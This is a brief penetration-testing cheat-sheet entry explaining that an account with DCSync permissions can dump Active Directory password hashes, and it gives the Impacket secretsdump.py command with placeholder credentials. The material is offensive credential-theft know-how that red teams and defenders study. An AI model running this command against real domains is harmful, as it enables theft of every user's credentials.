SecretsDump - dump hashes

#Account with DCSync permissions can dump hashes

#The following Impacket command dumps those hashes

#CD to Impacket

secretsdump.py 'useraccount:Password@10.0.0.1'

Last updated